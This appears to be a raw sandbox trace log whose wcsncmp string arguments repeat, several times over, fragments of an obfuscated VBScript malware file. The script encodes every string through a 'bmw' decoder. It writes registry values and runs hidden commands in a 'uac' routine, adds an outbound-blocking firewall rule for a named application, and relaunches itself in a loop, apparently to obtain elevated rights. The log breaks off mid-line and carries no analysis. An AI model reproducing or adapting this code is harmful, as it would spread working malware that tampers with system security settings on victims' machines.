WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.027] wcsncmp (_String1="e.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.027] wcsncmp (_String1=".Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.027] wcsncmp (_String1="Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0223.027] wcsncmp (_String1="pplicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0223.027] wcsncmp (_String1="plicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 